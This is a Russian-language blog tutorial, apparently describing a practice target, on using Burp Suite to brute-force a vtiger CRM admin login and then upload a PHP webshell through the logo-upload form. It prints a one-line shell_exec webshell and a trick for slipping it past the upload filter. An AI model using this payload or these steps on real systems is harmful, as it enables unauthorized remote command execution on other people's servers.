Сегодня начнем знакомство с Burp Suite. Возможно в следующих статьях я затрону OWASP-ZAP. Также рассмотрим специализированный браузер для пентестеров(очень советую ознакомиться). И напоследок зальем шел в уязвимый CRM.
Все это не совсем легально и законно, поэтому проделаю на специализированной площадке.
Итак подготовим наш браузер. Настроим прокси.
![](https://cryptoworld.su/wp-content/uploads/2017/11/66adb6165cda5ad0f9f0a.png)
Настройки Burp можно использовать по умолчанию.
![](https://cryptoworld.su/wp-content/uploads/2017/11/8ebf822b7662d1784ba54.png)
А теперь самое интересное. Когда вы сохраните данные настройки и начнете работать с браузером, то поймете, что каждая операция, будь то post, get или другие запросы будут проходить через Burp и отражаться в деталях. Данные запросы будут подсвечены во вкладке proxy, а детали будут показаны во вкладке Intercept.
![](https://cryptoworld.su/wp-content/uploads/2017/11/fcf58e637dd6b39df097d.png)
В самом же браузере ничего не изменится и вы не увидите запрашеваемую страницу, пока не нажмете кнопку Forward в Burp. После нажатия, во вкадке Target появится структура запрашиваемого сайта, а также найденые уязвимости и слабые места. Это результат работы плагинов Spider и Scanner, уже встроенных в Burp.
На самом деле для Burp написано большое количество дополнений, причем довольно полезных и интересных. Мы их рассмотрм в следующих статьях, когда будем более плотно работать с Burp.
Рассмотрим наше приложение. Это CRM на основе vtiger CRM 6.3.0.
![](https://cryptoworld.su/wp-content/uploads/2017/11/5b9696de8187a87172785.png)
Если изучить эту CRM, будет ясно, что у нее логин по умолчанию — это admin. А также есть уязвимость для внедрения шелкода.
Введем логин admin и пароль admin. Конечно это не подойдет ) но нам надо не это ) Нажимаем Sign In.
![](https://cryptoworld.su/wp-content/uploads/2017/11/5b6d2678a5e85aaea6b65.png)
Теперь идем в Burp и смотрим, что получилось.
![](https://cryptoworld.su/wp-content/uploads/2017/11/16f309908d88f382d8747.png)
Видно, что мы ввели. Это так называемые динамические данные(переменные), называйте как хотите. Смысл в том, что это те значения, которые изменяются. А главный помощник в работе с такими данными, это Intruder. Поэтому нажимаем ПКМ(правая кнопка мыши) и «Send to intruder» или Ctrl + I.
![](https://cryptoworld.su/wp-content/uploads/2017/11/fe8863de9501384938305.png)
Данный плагин подсветил все динамические значения, которые имеются на данной странице. Все нас не интересуют, только поле password. Нажимаем Clear. Потом выделяем admin после password и нажимаем Add.
![](https://cryptoworld.su/wp-content/uploads/2017/11/c34eaae9eae76a77aae06.png)
И выключаем Intercept.
![](https://cryptoworld.su/wp-content/uploads/2017/11/7f357f190a7e6903c8013.png)
Настроим Intruder.
![](https://cryptoworld.su/wp-content/uploads/2017/11/4d2db6e076e301641b746.png)
![](https://cryptoworld.su/wp-content/uploads/2017/11/17e95f36aa910bf4a5806.png)
Теперь нажимаем Start attack в правом верхнем углу. И работа пошла ))))
![](https://cryptoworld.su/wp-content/uploads/2017/11/b528a8f5c4f1ea8436156.png)
Перебор довольно длительный. И я лишь показываю, как работать с динамическими данными в Burp. Брут не всегда поможет, но даже не смотря на новости, пользователи до сих пор используют довольно простые пароли. И даже большие компании допускают подобные ошибки, так что пренебрегать данным методом глупо.
Спустя несколько часов я психанула и запустила еще 1 Intruder с другим словарем.
![](https://cryptoworld.su/wp-content/uploads/2017/11/e7d7808ee47234b852f0c.jpg)
Ура, по истичению нескольких часов(в моем случае) пароль найден. Пароль выделяется большей длинной, среди остальных =) Пароль не скажу, мало ли кто захочет поэксперементировать )
![](https://cryptoworld.su/wp-content/uploads/2017/11/6a8e02ceaf860f26f00ac.jpg)
Теперь пора зайти в админку CRM.
![](https://cryptoworld.su/wp-content/uploads/2017/11/44c5aaef3501bc97547e7.png)
Самое время залить наш shell =) Идем CRM Settings → Templates → Company Details → Edit
![](https://cryptoworld.su/wp-content/uploads/2017/11/46866230be1e6f4f9c294.png)
Выбираем картинку и нажимаем Save. Все это время работает Burp. И мы идем в него.
[ad name=»Responbl»]
Сымый простой Shell выглядит примерно так: <? echo shell_exec($_GET[‘e’]); ?> Но я залью свой ). Убрала php, т.к. фильтр бы не пропустил, а <? хватает =).
![](https://cryptoworld.su/wp-content/uploads/2017/11/e8fa450205c4b03ae102f.png)
Далее нажимаем Forward.
И запускаем наш Shell:
![](https://cryptoworld.su/wp-content/uploads/2017/11/696f84b96ddb122008b8a.png)
Уииии =))) Все получилось )) теперь можно делать все, что угодно ))
[ad name=»Responbl»]
В видео ниже будет показано более подробно. Развлекайтесь )
1 comments On Заливка шелла на сайт с помощью Burp Suite, OWASP Mantra.
домофон ? это сложнее он ломается топором